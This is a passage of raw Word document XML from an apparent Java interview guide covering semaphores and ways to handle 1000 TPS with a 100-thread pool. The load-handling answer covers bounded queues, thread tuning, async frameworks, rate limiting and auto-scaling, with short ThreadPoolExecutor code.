        <w:t xml:space="preserve">        // Create 5 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD8C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for (int i = 0; i &lt; 5; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF08A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new Thread(new Task()).start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFCD1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410D6AD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AC80DAC" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="008D08F4" w:rsidRDefault="00AF73EB" w:rsidP="008D08F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C1645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tatic class Task implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413323D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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1C3F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void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7E00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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A4BB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Acquire the semaphore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0517061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acquire();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51880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accessing the resource.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD69E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A34ED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Simulate some work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97A41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hread.sleep(2000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137ED2C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036926F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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740973B3"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A8984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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E6DE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Release the semaphore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF452E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releasing the resource.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D9B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release();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE667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B0E1D6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78BC6E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85A396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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858E1B5"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D7CCE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emaphore initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The semaphore is initialized with a counter value of 3, which allows up to 3 threads to access the resource at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DD506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Each thread tries to acquire the semaphore. If the counter is greater than 0, it decrements the counter and proceeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663458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When a thread is done using the resource, it releases the semaphore, incrementing the counter, allowing other threads to acquire the semaphore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E52E2"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Advantages of Semaphores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E8D0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Thread Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that only a specified number of threads access a resource at the same time, preventing conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4425391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Prevents Overloading</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Limits the number of threads that can access a shared resource, preventing overloading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630BB81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Improved Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows fine-grained control over concurrent access to shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A12B0F"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Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FDB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mplexity</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Semaphore-based synchronization can lead to complex code and increased chances of deadlocks if not used carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C8BA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tarvation</w:t>
      </w:r>
      <w:r w:rsidRPr="008D08F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If threads are not managed properly, some threads may never get access to the semaphore (called starvation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA74E6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In summary, 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powerful tool for managing concurrent access to shared resources in multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C76B39B" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00CE4B95"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7" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="073313F8" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRDefault="00B758F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D91BF79" w14:textId="5B4813E7" w:rsidR="00B758F9" w:rsidRPr="00CE4B95" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="_Toc197867527"/>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you create a thread pool of 100 threads and receive 1000 TPS (transactions per second) to your API, how would you handle the load</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
    </w:p>
    <w:p w14:paraId="56A6F565" w14:textId="4D9C623F" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Handling High Load with Thread Pool (1000 TPS vs 100 Threads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E211AFA"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cenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714C9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Thread pool size</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 100 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337993B0"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Incoming load</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 1000 requests per second (TPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A238EF1"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4433A324">
          <v:rect id="_x0000_i1878" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="212FA2B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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83422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Your </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread pool will be saturated quickly</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D47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Only </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>100 requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be processed </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrently</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F2685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Remaining </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>900 requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will go into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if any), or be </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rejected</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the queue is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7999BD80"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0C068355">
          <v:rect id="_x0000_i1879" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A07C6E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olutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3767031B"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1) Use Bounded Queue + Backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF059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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bounded BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., ArrayBlockingQueue) in ThreadPoolExecutor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB54E96"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If the queue is full, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reject new requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom RejectedExecutionHandle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backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F94B232"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ExecutorService executor = new ThreadPoolExecutor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368522F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100, 100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B793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0L, TimeUnit.MILLISECONDS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6385BC6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ArrayBlockingQueue&lt;&gt;(500), // limit queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9A50B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ThreadPoolExecutor.CallerRunsPolicy() // simple backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6717D313"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18096223"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70E912E4">
          <v:rect id="_x0000_i1880" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B069136"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2) Tune Thread Pool Based on CPU/IO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FD9CD0"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CPU-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, use:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>threads = cores * (1 + CPU utilization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D758305"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IO-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can afford more threads:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>threads = cores * (1 + wait time / service time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50303E24" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="0047282D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3886ABD1">
          <v:rect id="_x0000_i1881" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCD77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3) Use Asynchronous Non-Blocking Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E741CF7"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Spring WebFlux</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acto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Netty</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10,000+ concurrent requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with far fewer threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47883D4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Useful for IO-heavy APIs (DB calls, HTTP clients).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A35E8D"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17A357D">
          <v:rect id="_x0000_i1882" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F22F0"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4) Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C11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Bucket4j</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silience4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or API Gateway (e.g., AWS API Gateway, Kong) to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throttle or reject</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> excess requests gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4EA9B4"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6862B79A">
          <v:rect id="_x0000_i1883" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD135F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5) Auto-Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0710C4FD"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Horizontally </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scale the API server</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2961D97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un more containers or instances behind a load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E106AC"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2A7BD1">
          <v:rect id="_x0000_i1884" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C9B6C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3729"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="021DBB8F" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D76806F"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Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3629F160"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="0CD704DC" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49B0FB9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Bounded Queue + Backpressure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25B0DB3A"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events system crash due to overload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="4AE5BC2C" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE215A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hread Tuning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F65AE8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Matches capacity to hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="3A27F499" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A70CE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sync Frameworks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04A49D0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Scales beyond thread-per-request model</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="3B07E1DB" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29DF652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ate Limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A376AC4"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otects upstream systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="50362DBD" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="387063C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uto-Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AAFAABF"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Increases throughput capacity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49858905"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DCD7D8">
          <v:rect id="_x0000_i1885" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
